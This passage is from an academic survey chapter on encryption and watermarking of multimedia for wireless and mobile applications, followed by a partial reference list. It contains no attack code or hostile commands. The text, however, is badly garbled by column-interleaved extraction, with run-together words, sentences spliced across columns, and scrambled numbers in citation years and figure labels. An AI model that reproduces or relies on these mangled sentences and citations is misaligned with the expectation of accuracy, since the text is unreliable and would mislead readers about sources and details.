and so forth. The encrypted data part (Data part parameters of MP3 stream are encrypted, such as
0) and the other data parts are then combined to- the bit allocation information, which saves much
gether to generate the encrypted media data. The time or energy cost.
significanceoftheencrypteddatapartdetermines Partial image encryption. Some means are
the security of the encryption scheme. proposed to encrypt images partially or selectively.
For multimedia data are often compressed Forrawimages,onlysomeofthemostsignificant
before stored or transmitted, partial encryption bit-planes are encrypted for secure transmission
often combines with compression codecs (Liu & of image data in mobile environments (Podesser,
Eskicioglu, 2003). That is, for different multimedia Schmidt, & Uhl, 2002). Another image encryption
encoding codec, different partial encryption algo- algorithmScopigno
( Belfiore,
& is
)024 proposed,
rithm will be designed. During the past decade, which encrypts only the edge information in the
some partial encryption algorithms have been image decomposition that produces three separate
proposed, which are classified and analyzed as (1) edge location, (2) gray-tone or color
components:
follows according to the type of multimedia data inside the edges, and (3) residuum “smooth” im-
and the codecs. age.ForJPEGimages,somesignificantbit-planes
Partial audio encryption. Based on audio or ofdiscretecosinetransform(DCT)coefficientsin
speech codecs, some partial encryption algorithms JBIG are encrypted (Pfarrhofer & Uhl, 2005), and
have been proposed. For example, an algorithm only DCT blocks are permuted and DCT coef-
based on G.729 (Servetti & Martin, 2002a, 2002b) is ficients’ signs are encrypted in JPEG encoding

Figure 2. Experimental result of the image encryption algorithm
(a) Original image (b) Encrypted image
(Lian, Sun, & Wang, 2004a). These algorithms more popular. Combined with them, some video
obtain high perceptual security and encryption encryption algorithms have been proposed, which
efficiency. In JPEG20 image encryption, only saves time cost by encrypting the compressed video
thesignificantstreamsintheencoded data data stream
selectively or partially.
are encrypted (Ando, Watanabe, & Kiya, 2001, In MPEG1/2 codec, the signs of DCT coef-
2002; Lian, Sun, & Zhang, 2004b; Norcen & Uhl, ficients are encryptedvideo with the
encryption
2003; Pommer & Uhl, 2003), which is selected algorithm (VEA) (Shi & Bhargava, 1998a), the
according to the scalability in space or frequency signsofdirectcurrentcoefficients - (DCs)andmo
domain. These algorithms often keep secure in tion vectors are encrypted with a secret key (Shi &
perception. Figure 2 gives the encryption result Bhargava, 1998b), the base layer is encrypted while
of the algorithm proposed in Lian et al., 2004b). the enhancement layer is left unencrypted (Tosun
As can be seen, the encrypted image is unintel- Feng,
& a)
1 02 the
, DCTcoefficientsarepermuted
ligible. Additionally, in these algorithms, no more (Lian, Wang, & Sun, 2004c; Tang, 1996), or the
than 20% of the data stream is encrypted, which variablelengthcoding(VLC)tablesaremodified
obtainshighefficiency. by rearranging, random bit-flipping, or random
Partial video encryption. Compared with bit-insertion (Wu & Kuo, 2000, 2001).
images or audios, videos are often of higher re- In MPEG4 codec, the Minimal Cost Encryption
dundancy, which are compressed in order to save Scheme (Kim, Shin, & Shin, 2005) is proposed
the transmission bandwidth. Among the video to encrypt only the first 8 bytes in- the macro
codecs, MPEG1/2, MPEG4, and H.264/AVC are blocks (MBs) of a video object plane (VOP). It
Figure 3. VideoencryptionbasedonAVCcodec
(a) Original (b) Encrypted (Ahn et al., 2004) (c)Encrypted(Lianetal.,205a)

is implemented and proved suitable for wireless sion errors are often spread out due to encryption
terminals. A format-compliant configurable - en ciphertext-sensitivity (Mollin, 2006).
algorithms’
cryption framework (Wen, Severa, Zeng, Luttrell, In wireless/mobile applications, some means should
& Weiyin, 2002) is proposed for MPEG4 video be taken to reduce the error propagation.
encryption,whichcanbereconfiguredforagiven Constructing the encryption algorithms based
application scenario including wireless multimedia on error correction code may be a solution. For
communication. example, the encryption algorithm based on
In H.264/AVC codec, the intra-prediction mode forward error correction (FEC) code is proposed
of each block is permuted with the control of the key in Tosun & Feng, 2001b), which permutes the
(Ahn, Shim, Jeon, & Choi, 2004), which makes the information-bits and complements a subset of
video data degraded greatly. Some other algorithms the bits. The encryption algorithm can preserve
(Lian, Liu, & Ren, 2005a; Lian, Liu, Ren, & Wang, the error robustness of the encrypted multimedia
026a) encrypt the DCT coefficients and motion data, that is, the encrypted data stream can realize
vectors with sign encryption. For these algorithm error correction itself. Additionally, the encryption
encrypt both the texture information and motion algorithmisimplementedveryefficientlybecause
information, they often obtain high security in of the simple encryption operations. Thus, it has
human perception. Figure 3 shows the results of some desirable properties suitable for wireless
the algorithm proposed in Ahn et al. (2004) and multimedia transmission. However, the disad-
the one proposed in Lian et al. (2005a). As can be vantage is also clear that it is not secure against
seen, the video encrypted by the former algorithm known-plaintext attacks.
is still intelligible, while the video encrypted by Another solution is to change the block length
the latter algorithm is unintelligible. Thus, for in data encryption. Generally, the block length is in
high security, the latter encryption algorithm is close relation with the error propagation property.
preferred. Taking stream cipher and block cipher for examples,
the former one is of low error propagation, while
communication compliant the latter one is often of high error propagation.
Encryption Generally, the bigger the block length is, the higher
the error propagation is. Due to this case, a robust
Multimedia data are often encrypted before being encryption scheme for secure image transmission
transmitted. In the encrypted data stream, transmis- over wireless channels is proposed in Nanjunda,
Figure 4. Robust video encryption based on segment
Video
K
...
Frame 0 Frame 1 Frame N-1
K0 K1 KN-1
...
... ... ... ...
Slice 0 Slice 1 Slice M-1 Slice 0 Slice 1 Slice M-1 Slice 0 Slice 1 Slice M-1
K0 K0 K0 K1 K1 K1 KN-1 KN-1 KN-1

Figure5. Scalable encryption scheme for MPEG2 video

Compressed
media data
Encrypted
media data
Operated
media data
Decrypted
media data
Encryption Cut
Haleem, and Chandramouli (2005), which varies direct operation supported

the block length according to the channel’s error Encryption
properties. This method obtains a trade-off be-
tween the security and error robustness. However, To operate the encrypted multimedia data directly
some problems should be solved before hand, for without decryption is challenging while cost ef-
example, how to transmit the parameters of vary- ficient.Especiallyinwireless/mobileenvironment
ing the block length, and how to determine the no decryption and re-encryption operations are
channel’s error properties in advance. required, which saves much cost. Some solutions
Additionally, segment-based encryption algo- have been proposed to realize direct transcoding
rithms are proposed to reduce the effect cause by or bit rate conversion.
transmission errors. By partitioning the plaintext A secure transcoding scheme is proposed in
into segments and encrypting each segment inde- Chang, Han, Li, and Smith (2004). In this scheme,
pendently, the transmission errors can be limited in the multimedia data are decomposed into multiple
asegment.Theonlydifficultyistosynchronize streamstheat the source, each stream is encrypted
segments. An example proposed in Lian, Liu, Ren, independently, and each stream is annotated with
and Wang (2005b) is shown in Figure 4. It encrypts cleartext metadata. In transcoding, lower priority
advanced video coding (AVC) videos according streams are dropped directly based on the cleartext
to the following steps: (1) partition the video data metadata. The receiver can decrypt the remaining
into N frames (each frame acts as a segment), (2) streams and recombine them into the transcoded
partition each frame into M macroblocks (each output stream.
macroblock acts as a subsegment), and (3) encrypt As progressive and scalable encoding becomes
each frame with different keys (K0, K1,…, K N-1), more and more popular, such as JPEG2000, MPEG4
and encrypt all the macroblocks in a frame with FGS, SVC, and so forth, scalable encryption is
the same key. Thus, if a macroblock is lost, the focused, which supports direct bit rate conversion.
other macroblocks can still be recovered correctly. The scalable encryption algorithm encrypts the
If a frame is lost, the frame index can be used to progressive or scalable data streams, for example,
synchronize the key, and recover other frames base layer, middle layer, or enhance layer, one by
correctly. Thus, if the synchronization problem onefromthesignificantonestotheleastsignifican
is solved, the segment based encryption will be a ones. Thus, the bit rate can be changed by cutting the
good solution in wireless/mobile applications. insignificantstreamsdirectly.Forexample,Tosun
and Feng (2000) proposed the algorithm shown in

Figure 5, which encrypts only the base layer and trary, the watermarking algorithms with lost cost
middle layer in the three layers (base layer, middle are often of low security or robustness. This con-
layer, and enhancement layer) of an MPEG2 video tradiction becomes a problem in wireless/mobile
stream. In this algorithm, the enhancement layer environment when the limited energy or computing
is left unencrypted, which can be cut off directly. capability is provided. Experiments have been done
Wee and Apostolopoulos (2001, 2003) and Zhu, to analyze the energy consumption, complexity
Yuan, Wang, and Li (2005) proposed the algorithms and security level of multimedia watermarking
for secure scalable streaming enabling transcod- on mobile handheld devices (Kejariwal, Nicolau,
ing without decryption. Generally, the stream is Dutt, & Gupta, 2005). And some conclusions are
partitioned into segments according to the cipher’s drawn: (1) the security level often contradicts with
code length. To change the bit-rate, some segments energy consumption, (2) watermark extraction/
at the end of the stream are cut off directly. detection may be of higher cost than watermark
embedding, and (3) image resolution affects the
energy consumption. To conquer these problems,
tHE wAtErMArkIng AlgorItHMs some proposals are presented, for example, intro-
for wIrElEss MultIMEdIA duce the tunable parameter to obtain trade-offs
between security level, energy consumption, and
Watermarking algorithms (Barni & Bartolini, other performances, or move some computationally
2004; Cox et al., 2002) are generally composed expensive tasks to mobile proxies.
of two parts, that is, watermark embedding and
watermark extraction/detection. Generally, wa- Mobile Agent based task Partitioning
termarking algorithms should be robust to some
operations, such as recompression, A/D or D/A Mobile agents use the proxies as agents that can
conversion, noise, filtering, and so forth andto
connect can
a range of heterogeneous mobile ter-
survive such attacks as geometric attack, collusion minals. Using mobile agents to reduce the load of
attack, copy attack, and so forth. Similar to encryp- the server or terminals has been widely studied
tion algorithms, some watermarking algorithms (Burnside et al., 2002; Rao, Chang, Chen, & Chen,
may be of high security and robustness, but they 2001). If the mobile agent can implement water-
are also of high time or energy cost. On the con- mark embedding or extraction/detection, then the
terminals’ computing load will be greatly reduced.
Figure6. Watermarking tasks partitioning based on mobile agents

Figure 7. Architectures of some lightweight watermarking algorithms
Watermark
Fast Watermark Fast Inverse Watermarked

Media data
Transformation embed Transformation media data
(a) Fast transformation based watermarking embedding
Watermark
Compressed Partial Watermark Partial Watermarked

media data reconstruction embed encoding media data
(b) Watermarking embedding in compressed media data
The scheme proposed in Liu and Jiang (2005), as typicalonesareshowninFigure.The 7 firstone,

shown in Figure 6, uses mobile agent to replace as shown in Figure 7a, uses fast transformations
terminals to realize watermark detection, which to reduce the cost of converting media data into
decreases the server and network’s load during frequency domain. The second one, as shown in
detecting watermarks. In another scheme (Keja- Figure 7b, embeds the watermark into the com-
riwal, Gupta, Nicolau, Dutt, & Gupta, 2004), the pressed media data according to the following steps:
watermark embedding and detection tasks are both )reconstruct
1( thecoefficientspartiallyfromthe
partitioned and moved to mobile proxies completely compressed data stream, (2) embed the watermark
or partially. For example, to keep secure, only some intotheselectedcoefficients,andre- ) 3 ( encodethe
tasks not sensitive to the security are moved out, watermarkedcoefficients.Inthefollowingcontent
such as image transformation, bit decomposition, some lightweight watermarking algorithms are
plane alignment, and so forth. The partitioning introduced and analyzed.
schemes make watermarking applications more A scalable watermarking algorithm is proposed
practical in mobile environment. to mark the audio data encoded with Advanced
Audio Zip (AAZ) (Li, Sun, & Lian, 2005). In
lightweight watermarking this algorithm, the watermark is embedded into
Algorithms thequantizedmodifieddiscretecosinetransfor
(MDCT)coefficientsinthecorelayeradaptively,
Using mobile agents to implement some watermark- and detected by computing the correlation between
ing related tasks can reduce the load of the server the spreading sequence and the bitstream. A speech
or terminals in some extent. However, frequent watermarking scheme is proposed in Arora and
interaction between mobile agent and terminals Emmanuel (2003), which is designed based on the
are still costly. To reduce the cost of the server or adaptive modulation of spread spectrum sequences
terminals,improvingtheefficiencyof - watermark
and is robust against some removal or impairment
ing embedding, or extraction/detection algorithms attacks. The experiments in global system for
is a key problem. Considering that the watermark mobile communications (GSM) cellular commu-
is often embedded into the transformation domain, nications show that the algorithm is suitable for
some lightweight algorithms are proposed to imple- mobile applications.
ment transformation domain watermarking. Two

Forimages,anefficientsteganographyscheme robust video watermarking algorithm (Alattar,

(Pal, Saxena, & Muttoo, 2004) is proposed for Lin, & Celik, 2003) is proposed for low bit rate
resources constrained wireless networks. In this MPEG4 videos. In this algorithm, the watermark
scheme,thecoefficientsinHadamardtransform- is composed of both the synchronization template
domain are manipulated to contain some hidden and the watermark content combined with the
information. The Discrete Hadamard Transform template, and the watermark is embedded into
can be implemented using fast algorithms, which the alternative current AC) ( coefficients of th
makes the scheme computationally efficient luminanceandplane of the VOPs. The template can
practical in mobile communications. survive geometric attacks, such as transcoding,
For videos, a spread spectrum watermarking cropping, scaling, rotation, noise, and so forth.
algorithm (Petrescu, Mitrea, & Preteux, 2005) Experiments on various videos are done, which
is proposed to protect low rate videos. In this show good performances for the video rate ranging
algorithm, the DCT or wavelet coefficients of to 768kbit/s.
from 128kbit/s
transformed video data are watermarked with
spread spectrum sequences. Experiments are communication compliant
done for the videos varying from 64kbit/s to 256 Algorithms
kbit/s, and suitable transparency or robustness is
obtained.Furthermore,amoreefficientIn algorithm
wireless/mobile communication, transmission
(Checcacci, Barni, Bartolini, & Basagni, 2000) is errors often happen, which may reduce the wa-
proposed to mark MPEG4 videos. In this algorithm, termark detection rate. Generally, several means
only the Luma macroblocks are watermarked by may be adopted to improve the watermarking
adjustingthecoefficients’valueineach coefficient
algorithm’s robustness against transmission errors.
pair. It is proved efficient in implementation The firstand one, as shown in Figurea, 8 is applying
robust to transmission errors. Additionally, a more
Figure 8. Architectures of some robust watermarking algorithms
Media data
ECC Watermark Watermark ECC Extracted

Watermark
Encode embed extract decode watermark
(a) ECC based watermarking scheme
Watermark
MDC
Encode
Watermark MDC MDC Watermark

Media data Encode Decode extract
embed
MDC
Decode
Extracted
watermark
(b) MDC based watermarking scheme

error-correcting codes (ECC) to encode the wa- coMbInAtIon of MultIMEdIA

termark before embedding it into the multimedia EncryPtIon And MultIMEdIA
data. For example, the watermark can be repeated wAtErMArkIng
for several times (Kundur, 2001), such codes as
convolutional code, block code, or turbo code are Multimedia encryption and watermarking realize
used to encode the watermark (Ambroze et al., differentfunctionalities,forexample, - confidentia
2001), or the combination of watermark repetition ity protection and ownership protection, they can
and error-correcting code is used (Desset, Macq, & be combined together to provide stronger security.
Vandendorpe, 2002). This kind of method improves This is also required by some applications, such
the robustness by increasing the redundancy in the as secure multimedia sharing, secure multimedia
watermark. The second method, as shown in Fig- distribution, or exchange between watermarking
ure 8b, is using multiple description code (MDC) and encryption.
to transmit the watermark or the watermarked
multimedia data. For example, the watermark is secure Multimedia sharing
encoded with MDC before being embedded (Hsia,
Chang, & Liao, 2004), the watermarked media Multimedia sharing is more and more popular
data are transmitted based on MDC (Chu, Hsin, with the development of network technology, es-
Huang, Huang, & Pan, 2005; Pan, Hsin, Huang, pecially when such a network as p2p is developed.
& Huang, 2004), or both the watermark and the Generally, in these applications, the ownership
watermarked media data are encoded with MDC information is embedded into the multimedia
(Ashourian & Ho, 2003). This kind of method data with watermarking technology, and then the
adopts the redundancy of multimedia data and is watermarked multimedia data are encrypted and
more suitable for the scenario of high error rate. distributed. The ownership information can be
Another method (Song, Kim, Lee, & Kim, 2002) extracted later to prove the ownership right, and
partitions multimedia data into segments each of the encryption process prevents unauthorized users
whichfitsforthepacketinwirelesstransmission, from accessing the real content of the multimedia
and then embeds a watermark into each packet. data. A typical example is the music sharing sys-
Thus, it is robust to wireless packet error condi- tem, named Music2Share (Kalker, Epema, Hartel,
tions including not only channel error but also Lagendijk, & Steen, 2004), as shown in Figure 9. In
delay and jitter. this system, the watermark representing ownership
informationisembeddedintomusicfiles,andthe
Figure9. Architecture of a multimedia sharing system
Media
Server
Content
Access Right

watermarkedfilesareencryptedthen distributed
multimedia data should be decrypted before being
over p2p networks. The customer can access the watermarked. In some applications, if the operation
encrypted music files, while must applytriple for the
decryption-watermarking-encryption can be
right from the server before he can decrypt the avoided, the operation cost will be reduced greatly.
files.Thewatermarkextractedfromthe Inmusic filethe encrypted multimedia data can
this case,
can prove the legality of the music. be watermarked directly without decryption, and
the watermark can be extracted directly from the
secure Multimedia distribution encrypted or decrypted multimedia data. This kind
of watermarking-encryption pair is named com-
In secure multimedia distribution, multimedia mutative watermarking and encryption (CWE). A
data are transmitted from the server to customers practical scheme is proposed in Lian, Liu, Ren, and
in a secure way. In this case, the confidentiality Wang (2006c), which is based on partial encryption.
can be protected, and the illegal distributor who In this scheme, multimedia data are partitioned into
redistributes his/her copy to other customers can two parts, that is, the perception significant pa
be traced. Generally, both encryption and water- and the robust part, among which, the perception
marking technology are used. Till now, three kinds significantpartisencrypted,whiletherobustpa
of schemes have been proposed, which embed is watermarked. Thus, the encryption and water-
watermarks at the server side, in the router or at marking are independent of each other, and they
the client side, respectively. In thesupport first kind of
the commutative operations.
scheme, the customer information is embedded
into multimedia data at the server side before mul-
timedia encryption. This scheme is more suitable oPEn IssuEs
for unicast than for multicast or broadcast because
itisdifficultfortheservertoassign - differentcopbetween format
contradiction
ies to different customers simultaneously. In the Independence and format
second kind of scheme, the customer information compliance
is embedded by the routers in lower level (Brown,
Perkins, & Crowcroft, 1999), which distributes To keep low cost, partial encryption scheme is used
the server’s loading to the routers. This scheme to encrypt multimedia data, which keeps format
reduces the server’s loading, but also changes the compliant. Thus, for different multimedia data or
network protocols. In the third kind of scheme, the different codec, the encryption algorithms are often
customer information is embedded at the customer different. If various multimedia data are included in
side(Bloom,This . ) 30 2 schemeistimeefficient,an application, then various encryption algorithms
but the security is a problem because of the isola- should be used, and some extra information is re-
tion between decryption and watermarking. Some quired to tell which encryption algorithm has been
means (Anderson & Manifavas, 1997; Kundur & used. Compared with format compliant encryption,
Karthik, 2004; Lian, Liu, Ren, & Wang, 2006b) format independent encryption regards multimedia
have been proposed to improve the security, which data as binary data and is easy to support various
combine decryption with watermark embedding. data. Thus, for the applications with versatile data,
These combined methods improve the system’s format independent encryption is more suitable.
security at the same time of keeping low cost. For example, in such DRM systems as internet
streaming media alliance (ISMA), advanced access
commutative watermarking and content system (AACS), or open mobile alliance
Encryption (OMA) (Kundur et al., 2004), the algorithms,
advanced encryption standard (AES) and data
Generally, watermarking operation and encryp- encryption standard (DES), are recommended to
tion operation are separate. That is, the encrypted encrypt multimedia data not considering the fil

format. Thus, for practical applications, the trade- key Management in Mobile
off between computational cost and convenience Applications
is to be made, which determines which kind of
algorithm should be used. Multimedia encryption and watermarking can
both be controlled by the keys; key management
standardization of watermarking needs to be investigated. For example, whether
Algorithms the encryption key should be independent of the
watermarking key, and how to assign different
Compared with encryption algorithms that have decryption keys to different customers in mul-
been standardized to some extent, watermarking timedia distribution? Additionally, for multic
algorithms are still in study. For the diversity of or p2p networks, key generation and distribution
multimedia content, the difficulty in(Cherukuri, multimedia 2004; Eskicioglu, 2002) are important
understanding and the variety of applications, it topicsnotonlyinfixednetworksbutalsoinmobile
isdifficulttostandardizemultimedia - watermark
environments.
ing algorithms. Generally, they have different
performances in security, efficiency, robustness,
capacity, and so forth. Using which watermarking conclusIon
algorithm depends on the performances required
bytheapplications.Definingsuitable - watermark
In this chapter, mobile/wireless multimedia encryp-
ing algorithms will provide more convenience to tion and watermarking algorithms are introduced
wireless/mobile applications. and analyzed, including the general requirements,
various multimedia encryption algorithms, some
fingerprint Algorithms Against watermarking algorithms, the combination be-
collusion Attacks tween encryption and watermarking, and some
open issues. Among them, the multimedia encryp-
In secure multimedia distribution, collusion attack tionalgorithmsareclassifiedand-analyzedaccord
(Zhao, Wang, & Liu, 2005) threatens the system. ing to the functionalities, and the watermarking
That is, different customers combine their copies algorithms with low cost are emphasized. The
together through averaging, substitution, and so combination between encryption and watermark-
forth, which produces a copy without any customer ing brings up some new research topics, for ex-
information.Tocounterthisattack, - ample,
somefingerfingerprintorcommutativewatermarking
print encoding methods (Boneh & James, 1998; Wu, and encryption. And some open issues are also
Trappe, Wang, & Liu, 2004) have been proposed. presented, including the contradiction between
Thesemethodsgeneratedifferentfingerprint codesand format independence, the
format compliance
for different customers, and the colluded copy can standardization of watermarking algorithms, the
still tell one or more of the colluders. However, fingerprintalgorithmsresistingcollusionatt
there is still a trade-off between the watermark and the key management in mobile applications.
capacity and the supported customers, and some
new attacks are still not predicted, such as the linear
combination collusion attack (LCCA) attack (Wu, rEfErEncEs
Thus,
. )05 2 betterfingerprintencodingmethods
withgoodefficiencyareexpected. Ahn, J., Shim, H., Jeon, B., & Choi, I. (2004). Digital
video scrambling method using intra prediction
mode. In PacificRimConferenceonMultimedia,
PCM2004 (LNCS 3333, 386-393). Springer.
0
Alattar, A., Lin, E., & Celik, M. (2003). Digital wa- Brown, I., Perkins, C., & Crowcroft, J. (1999). Wa-
termarkingoflowbit-rateadvancedsimple profile
tercasting: Distributed watermarking for multicast
MPEG-4 compressed video. IEEE Transactions media. In Proceedings of the First International
on Circuits and Systems for Video Technology, Workshop on Networked Group Communication
13, 787-800. (LNCS 1736, pp. 286-300). Springer-Verlag.
Ambroze, A., Wade, G., Serdean, C., Tomlinson, Burnside, M., Clarke, D., Mills, T., Maywah, A.,
M., Stander, J., & Borda, M. (2001). Turbo code Devadas, S., & Rivest, R. (2002). Proxy-based
protection of video watermark channel. IEE Pro- security protocols in networked mobile devices.
ceedingsofVisionandImageSignalProcessing, In Proceedings of the 2002 ACM symposium on
148, 54-58. Applied Computing (pp. 265-272).
Anderson, R., & Manifavas, C. (1997). Cham- Chang, Y., Han, R., Li, C., & Smith, J. R. (2004).
leon—A new kind of stream cipher. In Fast Soft- Secure transcoding of Internet content. In Pro-
ware Encryption (LNCS, vol. 1267, pp. 107-113). ceedings of International Workshop on Intelligent
Springer-Verlag. Multimedia Computing and Networking (IMMCN)
(pp. 940-943).
Ando, K., Watanabe, O., & Kiya, H. (2001). Partial-
scrambling of still images based on JPEG2000. Checcacci, N., Barni, M., Bartolini, F., & Basagni,
In Proceedings of the International Conference S. (2000). Robust video watermarking for wireless
on Information, Communications, and Signal multimedia communications. In Proceedings of the
Processing, Singapore. 2000 IEEE Conference on Wireless Communica-
tions and Networking (pp. 1530-1535).
Ando, K., Watanabe, O., & Kiya, H. (2002). Par-
tial-scrambling of images encoded by JPEG2000. Cherukuri, S. (2004). An adaptive scheme to man-
IEICETransactions,J85-D-1 (2), 282-290. age mobility for secure multicasting in wireless
local area networks. Unpublished masters thesis,
Arora, S., & Emmanuel, S. (2003). Real-time
Arizona State University, Tempe.
adaptive speech watermarking scheme for mobile
applications. In Proceedings of the International Chu, S., Hsin, Y., Huang, H., Huang, K., & Pan, J.
Conference on Information, Communications & (2005). Multiple description watermarking for lossy
SignalprocessingICICS) ( —IEEEPacific-rimCon
- network. IEEE Computer Society,4, 3990-3993.
ference on Multimedia (PCM) (pp. 850-853).
Cox, I., Miller, M., & Bloom, J. (2002). Digital wa-
Ashourian, M., & Ho, Y. (2003). Multiple descrip- termarking. San Francisco: Morgan Kaufmann.
tion coding for image data hiding jointly in the
Desset, C., Macq, B., & Vandendorpe, L. (2002).
spatial and DCT domains. In ICICS 2003 (LNCS
Block error-correcting codes for systems with a
2836, 179-190).
very high BER: Theoretical analysis and application
Barni, M., & Bartolini, F. (2004). Watermark to the protection of watermarks. Signal Processing:
systems engineering. Marcel Dekker. Image Communication, 17, 409-421.
Bloom, J. (2003). Security and rights management Dutta, A., Das, S., Li, P., & Auley, A. (2004).
in digital cinema. Proceedings of IEEE Interna- Secured mobile multimedia communication for
tional Conference on Acoustic, Speech and Signal wireless Internet. In Proceedings of 2004 IEEE
Processing, 4, 712-715. International Conference on Networking, Sensing
& Control (pp. 181-186).
Boneh, D., & James, S. (1998). Collusion-secure
fingerprintingfordigital data.
IEEE Transactions Eskicioglu, A. (2002). Multimedia security in group
on Information Theory, 44(5), 1897-1905. communications: Recent progress in wired and
wireless networks. In Proceedings of the IASTED

International Conference on Communications of the 2004 Design Automation Conference (pp.

and Computer Network s, Cambridge, MA (pp. 556-561).
125-133).
Kejariwal, A., Nicolau, S., Dutt, A., & Gupta, N.
Furht, B., & Kirovski, D. (Eds.). (2006). Multi- (2005). Energy analysis of multimedia watermark-
media encryption and authentication techniques ing on mobile handheld devices. In Proceedings
and applications. Boca Raton, FL: Auerbach of the International Conference on Embedded
Publications. Systems for Real-Time Multimedia (ESTImedia
) 502 (pp. 33-38).
Gang, L., Akansu, A., Ramkumar, M., & Xie,
X. (2001). Online music protection and MP3 Kim, G., Shin, D., & Shin, D. (2005). Intellectual
compression. In Proceedings of the International property management on MPEG-4 video for hand-
SymposiumonIntelligentMultimedia,Video andand mobile video streaming service.
held device
Speech Processing (pp. 13-16). IEEE Transactions on Consumer Electronics,
1 5 (1), 139-143.
Ganz, A., Park, S., & Ganz, Z. (1998). Inline net-
work encryption for multimedia wireless LANs. Kundur, D. (2001). Watermarking with diversity:
In Proceedings of the IEEE Military Communica- insights and implications. IEEE Transactions on
tions Conference. Multimedia, 8, 46-52.
Ganz, A., Park, S., & Ganz, Z. (1999). Experimental Kundur, D., & Karthik, K. .)024( Video fin -
measurements and design guidelines for real-time gerprinting and encryption principles for digital
software encryption in multimedia wireless LANs. rights management. Proceedings of the IEEE,
Cluster Computing, 2(1), 35-43. 2 9 (6), 918-932.
Goodman, J., & Chandrakasan, A. (1998). Low Kundur, D., Yu, H., & Lin, C. (2004). Security and
power scalable encryption for wireless systems. digital rights management for mobile content. In
Wireless Networks, 4, 55-70. T. Wu & S. Dixit (Eds.), Content delivery in the
mobile Internet. John Wiley & Sons.
Hamalainen, P., Hannikainen, M., Hamalainen,
T.,&Saarinen,J..Configurable
) 1 02 ( hardware Kutter, M., Volosphynovskiy, S., & Herrigel, A.
implementation of triple DES encryption algorithm (2000). The watermarking copy attack. In Security
for wireless local area network. In Proceedings and Watermarking of Multimedia Contents II (SPIE
of the 2001 IEEE International Conference on 3971, pp. 371-380).
Acoustics, Speech and Signal Processing (pp.
Li, Z., Sun, Q., & Lian, Y. .)052 ( An adaptive
1221-1224).
scalable watermark scheme for high-quality audio
Hsia, Y., Chang, C., & Liao, J. (2004). Multiple-de- archiving and streaming applications. In Proceed-
scription coding for robust image watermarking. In ings of the IEEE International Conference on
Proceedings of the 2004 International Conference Multimedia and EXPO.
on Image Processing (pp. 2163-2166).
Lian, S., Liu, Z., & Ren, Z. (2005a). Selective video
Kalker, T., Epema, D., Hartel, P., Lagendijk, R., & encryption based on advanced video coding. In
Steen, M. (2004). Music2Share—Copyright-com- Proceedings of502Pacific-Rim Conference on
pliant music sharing in P2P systems. Proceedings Multimedia(PCM2Part , ) 50 II (LNCS 3768, pp.
oftheIEEE,2(9 6), 961-970. 281-290).
Kejariwal, A., Gupta, S., Nicolau, A., Dutt, N., & Lian, S., Liu, Z., Ren, Z., & Wang, H. (2006b).
Gupta, R. (2004). Proxy-based task partitioning Secure distribution scheme for compressed
of watermarking algorithms for reducing energy video stream. In Proceedings of the 026 IEEE
consumption in mobile devices. In Proceedings International Conference on Image Processing
(ICIP2. )06

Lian, S., Liu, Z., Ren, Z., & Wang, H. (2006c). Mollin, R. (2006). An introduction to cryptogra-
Commutative watermarking and encryption for phy. CRC Press.
media data. International Journal of Optical En-
Nanjunda, C., Haleem, M., & Chandramouli, R.
gineering,(8),5 4 0805101-0805103.
(2005). Robust encryption for secure image trans-
Lian, S., Liu, Z., Ren, Z., & Wang, Z. (2005b). Se- mission over wireless channels. In Proceedings of
lective video encryption based on advanced video the IEEE International Conference on Communi-
coding. In ProceedingsofPacific-RimConference cations (ICC) (pp. 1287-1291).
onMultimedia(PCM2) 50 (pp. 281-290).
Norcen, R., & Uhl, A. (2003). Selective encryption
Lian, S., Liu, Z., Ren, Z., & Wang, H. (2006a). of the JPEG2000 bitstream. In IFIP International
Secure advanced video coding based on selective Federation for Information Processing (LNCS
encryption algorithms. IEEE Transactions on 2828, 194-204).
ConsumerElectronics, 25
(2), 621-629.
Ong,C.Nahrstedt,
, Yuan,
K.& , Quality
.) W.302 (
Lian, S., Sun, J., & Wang, Z. (2004a). A novel image of protection for mobile multimedia applications.
encryption scheme based-on JPEG encoding. In In Proceedings of the IEEE International Con-
Proceedings of International Conference on Infor- ference on Multimedia and Expo (ICME2003),
mationVisualization(pp. (IV)042 217-220). Baltimore, MD.
Lian, S., Sun, J., Zhang, D., & Wang, Z. (2004b). Pal, S., Saxena, P., & Muttoo, S. (2004). Image
A selective image encryption scheme based on steganography for wireless networks using the
JPEG2000 codec. In ProceedingsofPacific-0 42 hadamard transform. In Proceedings of the 2004
Rim Conference on Multimedia (PCM2004) (LNCS International Conference on Signal Processing
3332, pp. 65-72). Springer. and Communications (pp. 131-135).
Lian, S., Wang, Z., & Sun, J. (2004c). A fast video Pan, J., Hsin, Y., Huang, H., & Huang, K. (2004).
encryption scheme suitable for network applica- Robust image watermarking based on multiple
tions. In Proceedings of International Conference description vector quantization. Electronics Let-
on Communications, Circuits and Systems, 1, ters, 40(22), 1409-1410.
566-570.
Petitcolas, F., Anderson, R., & Kuhn, M. (1999).
Linnartz, J., & Dijk, M. (1998, April 15-17). Analy- Information hiding—A survey. Proceedings of
sis of the sensitivity attack against electronic water- IEEE,87(7), 1062-1078.
marks in images. Paper presented at the Workshop
Petrescu, M., Mitrea, M., & Preteux, F. (2005). Low
on Information Hiding, Portland, OR.
rate video protection: The opportunity of spread
Liu,Q.Jiang,
&, X.Applications
. )05 2 ( ofmobile spectrum watermarking. WSEAS Transactions on
agent and digital watermarking technologies in Communications, 7(4), 478-485.
mobile communication network. In Proceedings
Pfarrhofer, R., & Uhl, A. (2005). Selective image
oftheInternational
502 ConferenceonWireless
encryption using JBIG. In Proceedings of the
Communications, Networking and Mobile Comput-
IFIP TC- 6 TC-1 international conference on
ing (pp. 1168-1170).
communications and multimedia security (CMS
Liu, X., & Eskicioglu, A. (2003). Selective encryp- ) 502 (pp. 98-107).
tion of multimedia content in distribution networks:
Podesser, M., Schmidt, H., & Uhl, A. (2002). Selec-
Challenges and new directions. In Proceedings of
tive bitplane encryption for secure transmission of
the IASTED International Conference on Com-
image data in mobile environments. In CD-ROM
munications, Internet and Information Technology
Proceedings of theth 5 IEEE Nordic Signal- Pro
(CIIT 2003). Scottsdale, AZ: ACTA Press.
cessing Symposium (NORSIG 2002).

Pommer, A., & Uhl, A. (2003). Selective en- Shi,J.Bhargava,

&, B.b)
89 1 ( An
. efficientMPEG
cryption of wavelet-packet encoded image data: video encryption algorithm. In Proceedings of the
Efficiency and security. In
Proceedings of the 6th ACM International Multimedia Conference,
Communications and Multimedia Security 2003 Bristol, UK (pp. 381-386).
(pp. 194-204).
Song, G., Kim, S., Lee, W., & Kim, J. (2002).
